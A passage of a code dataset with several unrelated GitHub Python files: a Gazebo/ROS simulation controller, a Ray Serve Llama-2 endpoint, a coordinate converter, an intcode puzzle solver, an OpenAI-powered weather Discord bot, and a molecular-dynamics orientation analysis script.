8, 8, 8),\n (7, 7, 7, 7, 7, 7, 7, 7, 7))))\n\n regions = ((13, 13, 13, 13, 13, 13, 14, 14, 14, 14,),\n (13, 0, 0, 1, 1, 2, 2, 3, 3, 14,),\n (13, 4, 5, 5, 6, 6, 7, 7, 8, 14,),\n (13, 9, 9, 10, 10, 11, 11, 12, 12, 14,),\n (13, 13, 13, 13, 14, 14, 14, 14, 14, 14,),)\n print(color_map(regions))\n print('bc:', color_map_bc(regions))\n\n\ndef test3():\n g = {1: {2, 4, 5, 3, 13},\n 2: {1, 4, 7, 3},\n 3: {2, 7, 8, 11, 1},\n 4: {1, 2, 5, 6, 7},\n 5: {1, 4, 6, 12, 13, 11},\n 6: {5, 4, 7, 10, 12, 2},\n 7: {2, 3, 8, 10, 6, 4, 9},\n 8: {3, 9, 7, 11},\n 9: {8, 10, 11, 7},\n 10: {7, 9, 11, 12, 6},\n 11: {13, 12, 10, 9, 3, 5, 8},\n 12: {6, 5, 10, 11, 13},\n 13: {11, 12, 5, 1}}\n print('t3: ', color_graph(g))\n\n\nif __name__ == '__main__':\n test_funcs = [test0, test1, test3]\n for test in test_funcs:\n test()\n","repo_name":"diwert-ai/Problems","sub_path":"Problems/Checkio/Simple/color map.py","file_name":"color map.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31165802282","text":"#!/usr/bin/env python3\n\nimport traceback\nfrom typing import List\nfrom typing import Tuple\nfrom typing import Dict\nimport time\nimport gazebo_msgs\nimport gazebo_msgs.srv\nimport rosgraph_msgs\n\nimport rospy\nfrom std_srvs.srv import Empty\n\nfrom lr_gym.envControllers.RosEnvController import RosEnvController\nfrom lr_gym.envControllers.JointEffortEnvController import JointEffortEnvController\nfrom lr_gym.envControllers.SimulatedEnvController import SimulatedEnvController \nfrom lr_gym.utils.utils import JointState, LinkState, RequestFailError\nimport os\nimport lr_gym.utils.dbg.ggLog as ggLog\nfrom lr_gym.utils.utils import Pose\nfrom lr_gym.utils.gazebo_models_manager import delete_model, spawn_model\n\n\nclass GazeboControllerNoPlugin(RosEnvController, JointEffortEnvController, SimulatedEnvController):\n \"\"\"This class allows to control the execution of a Gazebo simulation.\n\n It only uses the default gazebo plugins which 
are usually included in the installation.\n Because of this the duration of the simulation steps may not be accurate and simulation\n speed is low due to communication overhead.\n \"\"\"\n\n def __init__( self,\n usePersistentConnections : bool = False,\n stepLength_sec : float = 0.001,\n rosMasterUri : str = None):\n \"\"\"Initialize the Gazebo controller.\n\n Parameters\n ----------\n usePersistentConnections : bool\n Controls wheter to use persistent connections for the gazebo services.\n IMPORTANT: enabling this seems to create problems with the synchronization\n of the service calls. This breaks the pause/unpause/reset order and\n leads to deadlocks\n In theory it should have been fine as long as there are no connection\n problems and gazebo does not restart.\n\n Raises\n -------\n ROSException\n If it fails to find the gazebo services\n\n \"\"\"\n super().__init__()\n\n self._stepLength_sec = stepLength_sec\n self._lastUnpausedTime = 0\n self._episodeIntendedSimDuration = 0\n self._episodeWallStartTime = 0\n self._totalRenderTime = 0\n self._stepsTaken = 0\n\n self._lastStepRendered = None\n self._lastRenderResult = None\n self._usePersistentConnections = usePersistentConnections\n\n self._rosMasterUri = rosMasterUri\n\n def _makeRosConnections(self):\n serviceNames = {\"applyJointEffort\" : \"/gazebo/apply_joint_effort\",\n \"clearJointEffort\" : \"/gazebo/clear_joint_forces\",\n \"getJointProperties\" : \"/gazebo/get_joint_properties\",\n \"getLinkState\" : \"/gazebo/get_link_state\",\n \"pause\" : \"/gazebo/pause_physics\",\n \"unpause\" : \"/gazebo/unpause_physics\",\n \"get_physics_properties\" : \"/gazebo/get_physics_properties\",\n \"reset\" : \"/gazebo/reset_simulation\",\n \"setLinkState\" : \"/gazebo/set_link_state\",\n \"setLightProperties\" : \"/gazebo/set_light_properties\"}\n\n timeout_secs = 30.0\n for serviceName in serviceNames.values():\n try:\n rospy.loginfo(\"waiting for service \"+serviceName+\" ...\")\n rospy.wait_for_service(serviceName)\n rospy.loginfo(\"got service \"+serviceName)\n except rospy.ROSException as e:\n rospy.logfatal(\"Failed to wait for service \"+serviceName+\". Timeouts were \"+str(timeout_secs)+\"s. Exception = \"+str(e))\n raise\n except rospy.ROSInterruptException as e:\n rospy.logfatal(\"Interrupeted while waiting for service \"+serviceName+\". 
Exception = \"+str(e))\n raise\n\n self._applyJointEffortService = rospy.ServiceProxy(serviceNames[\"applyJointEffort\"], gazebo_msgs.srv.ApplyJointEffort, persistent=self._usePersistentConnections)\n self._clearJointEffortService = rospy.ServiceProxy(serviceNames[\"clearJointEffort\"], gazebo_msgs.srv.JointRequest, persistent=self._usePersistentConnections)\n self._getJointPropertiesService = rospy.ServiceProxy(serviceNames[\"getJointProperties\"], gazebo_msgs.srv.GetJointProperties, persistent=self._usePersistentConnections)\n self._getLinkStateService = rospy.ServiceProxy(serviceNames[\"getLinkState\"], gazebo_msgs.srv.GetLinkState, persistent=self._usePersistentConnections)\n self._pauseGazeboService = rospy.ServiceProxy(serviceNames[\"pause\"], Empty, persistent=self._usePersistentConnections)\n self._unpauseGazeboService = rospy.ServiceProxy(serviceNames[\"unpause\"], Empty, persistent=self._usePersistentConnections)\n self._getPhysicsProperties = rospy.ServiceProxy(serviceNames[\"get_physics_properties\"], gazebo_msgs.srv.GetPhysicsProperties, persistent=self._usePersistentConnections)\n self._resetGazeboService = rospy.ServiceProxy(serviceNames[\"reset\"], Empty, persistent=self._usePersistentConnections)\n self._setLinkStateService = rospy.ServiceProxy(serviceNames[\"setLinkState\"], gazebo_msgs.srv.SetLinkState, persistent=self._usePersistentConnections)\n self._setLightPropertiesService = rospy.ServiceProxy(serviceNames[\"setLightProperties\"], gazebo_msgs.srv.SetLightProperties, persistent=self._usePersistentConnections)\n\n #self._setGazeboPhysics = rospy.ServiceProxy(self._setGazeboPhysics, SetPhysicsProperties, persistent=self._usePersistentConnections)\n\n # Crete a publisher to manually send clock messages (used in reset, very ugly, sorry)\n self._clockPublisher = rospy.Publisher(\"/clock\", rosgraph_msgs.msg.Clock, queue_size=1)\n\n\n def startController(self):\n \"\"\"Start up the controller. This must be called after setCamerasToObserve, setLinksToObserve and setJointsToObserve.\"\"\"\n\n super().startController()\n\n self._makeRosConnections()\n\n\n rospy.loginfo(\"ROS time is \"+str(rospy.get_time())+\" pid = \"+str(os.getpid()))\n self.pauseSimulation()\n self.resetWorld()\n\n def _callService(self,serviceProxy : rospy.ServiceProxy) -> bool:\n \"\"\"Call the provided service. It retries in case of failure and handles exceptions. 
Returns false if the call failed.\n\n        Parameters\n        ----------\n        serviceProxy : rospy.ServiceProxy\n            ServiceProxy for the service to be called\n\n        Returns\n        -------\n        bool\n            True if the service was called, false otherwise\n\n        \"\"\"\n        done = False\n        counter = 0\n        maxRetry = 10\n        while not done and not rospy.is_shutdown():\n            if counter < maxRetry:\n                try:\n                    serviceProxy.call()\n                    done = True\n                except rospy.ServiceException as e:\n                    rospy.logerr(\"Service \"+serviceProxy.resolved_name+\", call failed: \"+traceback.format_exc())\n                except rospy.ROSInterruptException as e:\n                    rospy.logerr(\"Service \"+serviceProxy.resolved_name+\", call interrupted: \"+traceback.format_exc())\n                    counter+=maxRetry #don't retry\n                except rospy.ROSSerializationException as e:\n                    rospy.logerr(\"Service \"+serviceProxy.resolved_name+\", call failed to serialize: \"+traceback.format_exc())\n                counter += 1\n            else:\n                rospy.logerr(\"Failed to call service\")\n                break\n        return done\n\n    def pauseSimulation(self) -> bool:\n        \"\"\"Pause the simulation.\n\n        Returns\n        -------\n        bool\n            True if the simulation was paused, false in case of failure\n\n        \"\"\"\n        ret = self._callService(self._pauseGazeboService)\n        #rospy.loginfo(\"paused sim\")\n        self._lastUnpausedTime = rospy.get_time()\n        return ret\n\n    def unpauseSimulation(self) -> bool:\n        \"\"\"Unpause the simulation.\n\n        Returns\n        -------\n        bool\n            True if the simulation was unpaused, false in case of failure\n\n        \"\"\"\n        t = rospy.get_time()\n        if self._lastUnpausedTime>t:\n            rospy.logwarn(\"Simulation time increased since last pause! (time diff = \"+str(t-self._lastUnpausedTime)+\"s)\")\n        ret = self._callService(self._unpauseGazeboService)\n        #rospy.loginfo(\"unpaused sim\")\n        return ret\n\n    def isPaused(self):\n        return self._getPhysicsProperties.call().pause\n    \n    def resetWorld(self) -> bool:\n        \"\"\"Reset the world to its initial state.\n\n        Returns\n        -------\n        bool\n            True if the simulation was paused, false in case of failure\n\n        \"\"\"\n        self.pauseSimulation()\n        totalEpSimDuration = self.getEnvSimTimeFromStart()\n\n        ret = self._callService(self._resetGazeboService)\n\n        self._lastUnpausedTime = 0\n\n        # ggLog.info(f\"totalEpSimDuration = {totalEpSimDuration}\")\n        # ggLog.info(f\"self._episodeIntendedSimDuration = {self._episodeIntendedSimDuration}\")\n        totalSimTimeError = totalEpSimDuration - self._episodeIntendedSimDuration\n        if abs(totalSimTimeError)>=0.1:\n            rospy.logwarn(\"Episode error in simulation time keeping = \"+str(totalSimTimeError)+\"s (This is just an upper bound, may actually be fine)\")\n\n        # totalEpRealDuration = time.time() - self._episodeWallStartTime\n        # if self._episodeRealSimDuration!=0:\n        #     ratio = float(totalEpSimDuration)/self._episodeRealSimDuration\n        # else:\n        #     ratio = -1\n        # if totalEpRealDuration!=0:\n        #     totalRatio = float(totalEpSimDuration)/totalEpRealDuration\n        # else:\n        #     totalRatio = -1\n        # if totalEpSimDuration!=0:\n        #     rospy.loginfo( \"Duration: sim={:.3f}\".format(totalEpSimDuration)+\n        #                    \" real={:.3f}\".format(totalEpRealDuration)+\n        #                    \" sim/real={:.3f}\".format(totalRatio)+ # Achieved sim/real time ratio\n        #                    \" step-time-only ratio ={:.3f}\".format(ratio)+ #This would be the sim/real time ratio if there was no overhead for sending actions and getting observations\n        #                    \" totalRenderTime={:.4f}\".format(self._totalRenderTime)+\n        #                    \" realFps={:.2f}\".format(self._stepsTaken/totalEpRealDuration)+\n        #                    \" simFps={:.2f}\".format(self._stepsTaken/totalEpSimDuration))\n        self._episodeIntendedSimDuration = 0\n        self._episodeWallStartTime = time.time()\n        
self._totalRenderTime = 0\n        self._stepsTaken = 0\n\n        # Reset the time manually. Incredibly ugly, incredibly effective\n        t = rosgraph_msgs.msg.Clock()\n        self._clockPublisher.publish(t)\n\n\n\n        #rospy.loginfo(\"resetted sim\")\n        return ret\n\n\n    def step(self) -> float:\n        \"\"\"Run the simulation for the specified time.\n\n        It unpauses the simulation, sleeps and then pauses it back. It may not be precise.\n\n        Parameters\n        ----------\n        runTime_secs : float\n            Time to run the simulation for, in seconds\n\n        Returns\n        -------\n        None\n\n\n        Raises\n        -------\n        ExceptionName\n            Why the exception is raised.\n\n        \"\"\"\n\n        t0_real = time.time()\n        t0 = rospy.get_time()\n        self.unpauseSimulation()\n        t1 = rospy.get_time()\n        rospy.sleep(self._stepLength_sec)\n        t2 = rospy.get_time()\n        self.pauseSimulation()\n        t3 = rospy.get_time()\n        tf_real = time.time()\n        self._episodeIntendedSimDuration += t3 - t0\n        rospy.loginfo(\"t0 = \"+str(t0)+\" t3 = \"+str(t3))\n        rospy.loginfo(\"Unpaused for a duration between \"+str(t2-t1)+\"s and \"+str(t3-t0)+\"s\")\n\n        self._stepsTaken+=1\n\n        return self._stepLength_sec\n\n\n\n\n    def setJointsEffortCommand(self, jointTorques : List[Tuple[str,str,float]]) -> None:\n        for command in jointTorques:\n            jointName = command[1]\n            torque = command[2]\n            duration_secs = self._stepLength_sec\n            secs = int(duration_secs)\n            nsecs = int((duration_secs - secs) * 1000000000)\n\n            request = gazebo_msgs.srv.ApplyJointEffortRequest()\n            request.joint_name = jointName\n            request.effort = torque\n            request.duration.secs = secs\n            request.duration.nsecs = nsecs\n            res = self._applyJointEffortService.call(request)\n            if not res.success:\n                rospy.logerr(\"Failed applying effort for joint \"+jointName+\": \"+res.status_message)\n\n\n    def getJointsState(self, requestedJoints : List[Tuple[str,str]]) -> Dict[Tuple[str,str],JointState]:\n        #ggLog.info(\"GazeboControllerNoPlugin.getJointsState() called\")\n        gottenJoints = {}\n        missingJoints = []\n        for joint in requestedJoints:\n            jointName = joint[1]\n            modelName = joint[0]\n\n            gotit = False\n            tries = 0\n            while not gotit and tries <10:\n                jointProp = self._getJointPropertiesService.call(jointName) ## TODO: this ignores the model name!\n                #ggLog.info(\"Got joint prop for \"+jointName+\" = \"+str(jointProp))\n                gotit = jointProp.success\n                tries+=1\n            if gotit:\n                jointState = JointState(list(jointProp.position), list(jointProp.rate), None) #NOTE: effort is not returned by the gazebo service\n                gottenJoints[(modelName,jointName)] = jointState\n            else:\n                missingJoints.append(joint)\n                # err = \"GazeboControllerNoPlugin: Failed to get state for joint '\"+str(jointName)+\"' of model '\"+str(modelName)+\"'\"\n                # ggLog.error(err)\n                # raise RuntimeError(err)\n\n        if len(missingJoints)>0:\n            err = f\"Failed to get state for joints {missingJoints}. 
requested {requestedJoints}\"\n # rospy.logerr(err)\n raise RequestFailError(message=err, partialResult=gottenJoints)\n\n\n return gottenJoints\n\n\n\n def getLinksState(self, requestedLinks : List[Tuple[str,str]]) -> Dict[Tuple[str,str],LinkState]:\n gottenLinks = {}\n missingLinks = []\n for link in requestedLinks:\n linkName = link[0]+\"::\"+link[1]\n resp = self._getLinkStateService.call(link_name=linkName)\n\n if resp.success:\n linkState = LinkState( position_xyz = (resp.link_state.pose.position.x, resp.link_state.pose.position.y, resp.link_state.pose.position.z),\n orientation_xyzw = (resp.link_state.pose.orientation.x, resp.link_state.pose.orientation.y, resp.link_state.pose.orientation.z, resp.link_state.pose.orientation.w),\n pos_velocity_xyz = (resp.link_state.twist.linear.x, resp.link_state.twist.linear.y, resp.link_state.twist.linear.z),\n ang_velocity_xyz = (resp.link_state.twist.angular.x, resp.link_state.twist.angular.y, resp.link_state.twist.angular.z))\n\n gottenLinks[link] = linkState\n else:\n # err = f\"Failed to get Link state for link {linkName}: resp = {resp}\"\n # ggLog.warn(err)\n # world_props = rospy.ServiceProxy(\"/gazebo/get_world_properties\", gazebo_msgs.srv.GetWorldProperties)()\n # ggLog.error(f\"World properties are: {world_props}\")\n # model_props = rospy.ServiceProxy(\"/gazebo/get_model_properties\", gazebo_msgs.srv.GetModelProperties)(model_name=link[0])\n # ggLog.error(f\"Model '{link[0]}' properties are: {model_props}\")\n missingLinks.append(link) \n \n if len(missingLinks)>0:\n err = f\"Failed to get state for links {missingLinks}. requested {requestedLinks}\"\n # rospy.logerr(err)\n raise RequestFailError(message=err, partialResult=gottenLinks)\n \n return gottenLinks\n\n def getEnvSimTimeFromStart(self) -> float:\n return rospy.get_time()\n\n\n def setRosMasterUri(self, rosMasterUri : str):\n self._rosMasterUri = rosMasterUri\n\n def spawnModel(self, xacro_file_path : str,\n pose : Pose = Pose(0,0,0,0,0,0,1), \n args : Dict[str,str] = {}, \n model_name = \"model\", \n robot_namespace = \"\", \n reference_frame = \"world\",\n format = \"urdf\"):\n \"\"\"Spawn a model in the environment, arguments depend on the type of SimulatedEnvController\n \"\"\"\n spawn_model(xacro_file_path = xacro_file_path,\n pose = pose, \n args = args, \n model_name = model_name, \n robot_namespace = robot_namespace, \n reference_frame = reference_frame,\n format = format)\n\n\n def deleteModel(self, model : str):\n \"\"\"Delete a model from the environment\"\"\"\n delete_model(model_name=model)\n\n\n def setJointsStateDirect(self, jointStates : Dict[Tuple[str,str],JointState]):\n \"\"\"Set the state for a set of joints\n\n Parameters\n ----------\n jointStates : Dict[Tuple[str,str],JointState]\n Keys are in the format (model_name, joint_name), the value is the joint state to enforce\n \"\"\"\n raise NotImplementedError()\n \n\n def setLinksStateDirect(self, linksStates : Dict[Tuple[str,str],LinkState]):\n \"\"\"Set the state for a set of links\n\n Parameters\n ----------\n linksStates : Dict[Tuple[str,str],LinkState]\n Keys are in the format (model_name, link_name), the value is the link state to enforce\n \"\"\"\n \n ret = {}\n for item in linksStates.items():\n linkName = item[0][1]\n modelName = item[0][0]\n linkState = item[1]\n req = gazebo_msgs.srv.SetLinkStateRequest()\n req.link_state = gazebo_msgs.msg.LinkState()\n req.link_state.link_name = modelName+\"::\"+linkName\n req.link_state.reference_frame = \"world\"\n req.link_state.pose = 
linkState.pose.getPoseStamped(frame_id = \"world\").pose\n req.link_state.twist.linear.x = linkState.pos_velocity_xyz[0]\n req.link_state.twist.linear.y = linkState.pos_velocity_xyz[1]\n req.link_state.twist.linear.z = linkState.pos_velocity_xyz[2]\n req.link_state.twist.angular.x = linkState.ang_velocity_xyz[0]\n req.link_state.twist.angular.y = linkState.ang_velocity_xyz[1]\n req.link_state.twist.angular.z = linkState.ang_velocity_xyz[2]\n\n #print(req)\n #print(type(req))\n resp = self._setLinkStateService(req)\n \n if not resp.success:\n ggLog.error(\"Failed setting link state for link \"+modelName+\"::\"+linkName+\": \"+resp.status_message)\n # else:\n # ggLog.info(\"Successfully set Linkstate for link \"+modelName+\"::\"+linkName)\n return ret\n\n def freerun(self, duration_sec : float):\n wasPaused = self.isPaused()\n if wasPaused:\n self.unpauseSimulation()\n rospy.sleep(duration_sec)\n if wasPaused:\n self.pauseSimulation()\n\n \n def setupLight(self, gz_req : gazebo_msgs.srv.SetLightPropertiesRequest):\n res = self._setLightPropertiesService.call(gz_req)\n if not res.success:\n ggLog.error(f\"GazeboControllerNoPlugin: failed to setup Light.\\n req = {gz_req}\\n res={res}\")\n return False\n return True","repo_name":"c-rizz/lr_gym","sub_path":"lr_gym/src/lr_gym/envControllers/GazeboControllerNoPlugin.py","file_name":"GazeboControllerNoPlugin.py","file_ext":"py","file_size_in_byte":19753,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"71459097643","text":"# from transformers import AutoTokenizer\nmodel_name = \"michaelfeil/ct2fast-Llama-2-7b-hf\"\n\nfrom hf_hub_ctranslate2 import GeneratorCT2fromHfHub\nimport requests\nfrom starlette.requests import Request\nfrom typing import Dict\n\nfrom ray import serve\n\n@serve.deployment(route_prefix=\"/serve/llama7b\")\nclass Llama7BDeployment:\n def __init__(self):\n self.model = GeneratorCT2fromHfHub(\n model_name_or_path=model_name,\n device=\"cpu\",\n compute_type=\"int8\",\n )\n\n async def __call__(self, request: Request) -> Dict:\n # Extracting the message from the request's JSON body\n json_data = await request.json()\n message = json_data.get(\"message\", \"\")\n\n outputs = self.model.generate(\n text=[message],\n max_length=128,\n include_prompt_in_result=False\n )\n \n # I noticed you returned {\"result\": self._msg} which would cause an error since self._msg is not defined.\n # Assuming you want to return the generated outputs:\n return {\"result\": outputs}\n\napp = Llama7BDeployment.bind()\n\n# 2: Deploy the application locally.\nserve.run(app)\n\nimport requests\n\n# Define the URL for the endpoint\nurl = \"http://localhost:8000/serve/llama7b\"\n\n# Define the payload\ndata = {\n \"message\": \"Your input text here\"\n}\n\n# Send a POST request\nresponse = requests.post(url, json=data)\n\n# Print the response\nprint(response.json())\n\n","repo_name":"JinL0/ray-serve-llama","sub_path":"llama2_7b.py","file_name":"llama2_7b.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28170118824","text":"import StringUtilities\n\nclass CoordinatesService:\n a = 1\n\ndef DMSToDecimalDegrees(DMSString):\n if(StringUtilities.isBlank(DMSString)):\n return \"\"\n\n values = DMSString.split(\" \")\n seconds, direction = values[2][0:len(values[2]) - 1], values[2][-1]\n TheLatitudeValue = float(values[0]) + ((float(values[1])) / 60) + ((float(seconds)) / 3600)\n\n if (direction == 
\"W\" or direction == \"S\"):\n TheLatitudeValue = 0 - TheLatitudeValue\n\n return TheLatitudeValue","repo_name":"UdaySaiTyada/GeoSpatialRendering","sub_path":"CoordinatesService.py","file_name":"CoordinatesService.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26729174693","text":"def make_operation (input):\n opcode = \"\"\n param1Mode = False\n param2Mode = False\n param3Mode = False\n\n parsed = list(str(input))\n parsed.reverse()\n\n idx = 0\n while idx < len(parsed):\n comp = parsed[idx]\n if idx == 0:\n opcode = comp\n elif idx == 1:\n opcode = comp + opcode\n elif idx == 2:\n if comp == \"1\":\n param1Mode = True\n elif idx == 3:\n if comp == \"1\":\n param2Mode = True\n elif idx == 4:\n if comp == \"1\":\n param3Mode = True\n idx +=1\n\n\n return [int(opcode), param1Mode, param2Mode, param3Mode]\n\ndef get_value (input, index, mode):\n if mode == False:\n return instructions[index]\n else:\n return index\n\ndef get_dest (input, index, mode):\n return index\n\ninstructions = []\n\nwith open('input.txt', 'r') as file:\n data = file.read()\n instructions = list(map(int, data.split(\",\")))\n\n# 1 - Add next two integers together, store in 3rd\n# 2 - Multiply two integers together, store in 3rd\n# 3 - Store input at address\n# 4 - Output value at address\n# 99 - End\n\ninput = 1\noutput = 0\n\nidx = 0\n\nprint(\"Have instructions\", len(instructions))\n\n# instructions[1] = 12\n# instructions[2] = 2\n\n\n\nwhile idx < len(instructions):\n raw = instructions[idx]\n print(\"Raw {}\".format(raw))\n\n operation = make_operation(raw)\n\n val = operation[0]\n param1Mode = operation[1]\n param2Mode = operation[2]\n param3Mode = operation[3]\n\n if val == 1:\n sl = instructions[idx + 1: idx + 4]\n print(\"Add slice {}\".format(sl))\n # print(\"Slice\", sl)\n # print(instructions[idx:idx+10])\n p1 = get_value(instructions, sl[0], param1Mode)\n p2 = get_value(instructions, sl[1], param2Mode)\n newval = p1 + p2\n # dest = sl[2]\n dest = get_dest(instructions, sl[2], param3Mode)\n instructions[dest] = newval\n idx += 4\n elif val == 2:\n sl = instructions[idx + 1: idx + 4]\n print(\"Mul slice {}\".format(sl))\n p1 = get_value(instructions, sl[0], param1Mode)\n p2 = get_value(instructions, sl[1], param2Mode)\n newval = p1 * p2\n # dest = sl[2]\n dest = get_dest(instructions, sl[2], param3Mode)\n instructions[dest] = newval\n idx += 4\n elif val == 3:\n dest = get_dest(instructions, instructions[idx+1], param1Mode)\n instructions[dest] = input\n print(\"Input set {} to value {}\".format(dest, input))\n idx += 2\n elif val == 4:\n val = instructions[idx+1] if param1Mode else instructions[instructions[idx+1]]\n output = val\n print(\"Output set {} to value {}\".format(dest, output))\n\n idx += 2\n else:\n print(\"Breaking at val {}\".format(val))\n break\n\nprint (\"Diagnostic code \", output)\n\n\n ","repo_name":"chedabob/adventofcode-2019","sub_path":"day5/day5p1.py","file_name":"day5p1.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34158217537","text":"import discord\r\nimport time\r\nimport os\r\nimport requests\r\nfrom discord.ext import commands\r\nimport openai\r\nfrom dotenv import load_dotenv \r\nload_dotenv()\r\n\r\nTOKEN = os.getenv('DISCORD_TOKEN')\r\nAPI_KEY = os.getenv('API_KEY')\r\napi_endpoint = 'http://dataservice.accuweather.com/forecasts/v1/daily/1day/331243?apikey=' + 
API_KEY\r\n# Initialize variables for chat history\r\nexplicit_input = \"\"\r\nchatgpt_output = 'Chat log: /n'\r\ncwd = os.getcwd()\r\ni = 1\r\n\r\n# Find an available chat history file\r\nwhile os.path.exists(os.path.join(cwd, f'chat_history{i}.txt')):\r\n i += 1\r\n\r\nhistory_file = os.path.join(cwd, f'chat_history{i}.txt')\r\n\r\n# Create a new chat history file\r\nwith open(history_file, 'w') as f:\r\n f.write('\\n')\r\n\r\n# Initialize chat history\r\nchat_history = ''\r\n\r\n#api\r\ndata = ''\r\nresponse = requests.get(api_endpoint)\r\nif response.status_code == 200:\r\n data = response.json()\r\n print(data)\r\nelse:\r\n print(f\"Error: {response.status_code}\")\r\n\r\n#OPEN AI STUFF\r\n#Put your key in the .env File and grab it here\r\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\r\n\r\nname = 'Flint Lockwood'\r\n\r\nrole = 'meteorologist'\r\n# Define the impersonated role with instructions\r\nimpersonated_role = f\"\"\"\r\n From now on, you are going to act as {name}. Your role is {role}. You must act like we are in the cloudy with a chance of meatballs world.\r\n When it rains, you must act like it is raining meatballs. Use the weather given from this JSON {data}.\"\"\"\r\n\r\n# Function to complete chat input using OpenAI's GPT-3.5 Turbo\r\ndef chatcompletion(user_input, impersonated_role, explicit_input, chat_history):\r\n output = openai.ChatCompletion.create(\r\n model=\"gpt-3.5-turbo-0301\",\r\n temperature=1,\r\n presence_penalty=0,\r\n frequency_penalty=0,\r\n max_tokens=2000,\r\n messages=[\r\n {\"role\": \"system\", \"content\": f\"{impersonated_role}. Conversation history: {chat_history}\"},\r\n {\"role\": \"user\", \"content\": f\"{user_input}. {explicit_input}\"},\r\n ]\r\n )\r\n\r\n for item in output['choices']:\r\n chatgpt_output = item['message']['content']\r\n\r\n return chatgpt_output\r\n\r\n# Function to handle user chat input\r\ndef chat(user_input):\r\n global chat_history, name, chatgpt_output\r\n current_day = time.strftime(\"%d/%m\", time.localtime())\r\n current_time = time.strftime(\"%H:%M:%S\", time.localtime())\r\n chat_history += f'\\nUser: {user_input}\\n'\r\n chatgpt_raw_output = chatcompletion(user_input, impersonated_role, explicit_input, chat_history).replace(f'{name}:', '')\r\n chatgpt_output = f'{name}: {chatgpt_raw_output}'\r\n chat_history += chatgpt_output + '\\n'\r\n with open(history_file, 'a') as f:\r\n f.write('\\n'+ current_day+ ' '+ current_time+ ' User: ' +user_input +' \\n' + current_day+ ' ' + current_time+ ' ' + chatgpt_output + '\\n')\r\n f.close()\r\n return chatgpt_raw_output\r\n\r\n\r\n#DISCORD STUFF\r\nintents = discord.Intents().all()\r\nclient = commands.Bot(command_prefix=\"!\", intents=intents)\r\n#Set up your commands to grab them.\r\n\r\n@client.event\r\nasync def on_ready():\r\n print(\"Bot is ready\")\r\n\r\n@client.command()\r\nasync def location(ctx):\r\n await ctx.send(\"Hello, I provide forecast information for Charlottesville, VA.\")\r\n\r\n@client.command()\r\nasync def Help(ctx):\r\n await ctx.send(\"Hello, my name is Flint Lockwood, and I am here to answer any weather related questions for the day. You can type !help for a list of other commands, otherwise, simply ask me a question and I shall answer!\")\r\n\r\n@client.command()\r\nasync def whoami(ctx):\r\n await ctx.send(\"My name is Flint Lockwood, and I live in Swallow Falls. I am an inventor and made it so that instead of raining water, it rains food!\")\r\n\r\n@client.command()\r\nasync def rules(ctx):\r\n await ctx.send(\"No profanity! 
Respect Everyone. Enjoy the food that falls from the sky!\")\r\n\r\n\r\n@client.event\r\nasync def on_message(message):\r\n print(message.content)\r\n if message.author == client.user:\r\n return\r\n print(message.author)\r\n print(client.user)\r\n print(message.content)\r\n if message.content.startswith('!'):\r\n await client.process_commands(message)\r\n else:\r\n answer = chat(message.content)\r\n await message.channel.send(answer)\r\n\r\n\r\n@client.command()\r\n@commands.is_owner()\r\nasync def shutdown(context):\r\n exit()\r\n#load data in a stats table\r\n\r\n\r\nclient.run(TOKEN)","repo_name":"kttsai1/DS2002","sub_path":"data_project_2/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19160741328","text":"from DiscUtils import *\nimport matplotlib.pyplot as plt\n\n\n# Trajectory paths\ndcdPath = '../Current_D1_trajectory/D1_combined_pbc_fixed.dcd'\npsfPath = '../Current_D1_trajectory/D1_combined.psf'\ndt = 2e-10 \n\ndef P_2(v, t):\n # the second order Legendre polynomial\n intervals = len(v) - t\n total = 0.0\n for t_0 in range(intervals):\n total += (np.vdot(v[t_0], v[t_0+t]) ** 2)\n avg = total / (intervals)\n return (3/2.) * avg - (1/2.)\n\n\ndef cos2theta_fun(initpos, pos):\n return np.power(np.vdot(initpos,pos),2)\n\n\ndef main():\n u = mda.Universe(psfPath, dcdPath)\n nframes = len(u.trajectory)\n # coarse grain atoms \n x1 = u.select_atoms('bynum 21', updating=True)\n x2 = u.select_atoms('bynum 232', updating=True)\n y1 = u.select_atoms('bynum 121', updating=True)\n y2 = u.select_atoms('bynum 332', updating=True)\n\n xs = np.zeros(nframes)\n x_axis_positions = np.zeros((nframes, 3))\n y_axis_positions = np.zeros((nframes, 3))\n z_axis_positions = np.zeros((nframes, 3))\n u_positions = np.zeros((nframes, 3))\n for i,ts in enumerate(u.trajectory):\n # Get local coordinate axes \n x1_pos = x1[0].position\n x2_pos = x2[0].position\n x = (x1_pos - x2_pos) / (np.linalg.norm(x1_pos - x2_pos))\n y1_pos = y1[0].position\n y2_pos = y2[0].position\n y = (y1_pos - y2_pos) / (np.linalg.norm(y1_pos - y2_pos))\n z = np.cross(x, y) \n \n x_axis_positions[i] = x \n y_axis_positions[i] = y \n z_axis_positions[i] = z / np.linalg.norm(z) \n \n # The unit vector is attached to one of the x-axis points\n # and subtends a 45 degree angle with the horizon\n tvec = (x + y + z) / np.linalg.norm(x + y + z)\n tpos = x1_pos + tvec \n u_positions[i] = (tpos - x1_pos) / np.linalg.norm(tpos - x1_pos)\n u_positions[i][0] = -u_positions[i][0]\n # X points for graphing \n #xs[i] = dt * i \n xs[i] = dt * i / (1e-9) \n\n print('initial pos of unit vector: {}'.format(u_positions[0]))\n print('initial pos of z-axis: {}'.format(z_axis_positions[0]))\n n = 6000 \n v = np.zeros(n)\n v[0] = 0\n theta = np.arccos(np.vdot(u_positions[0], z_axis_positions[0]))\n cos2theta = np.power(np.cos(theta), 2)\n sin2theta = np.power(np.sin(theta), 2) \n sin4theta = np.power(np.sin(theta), 4)\n alpha1 = (1/4.) * np.power((3 * cos2theta-1), 2)\n alpha2 = 3 * sin2theta * cos2theta\n alpha3 = (3/4.) 
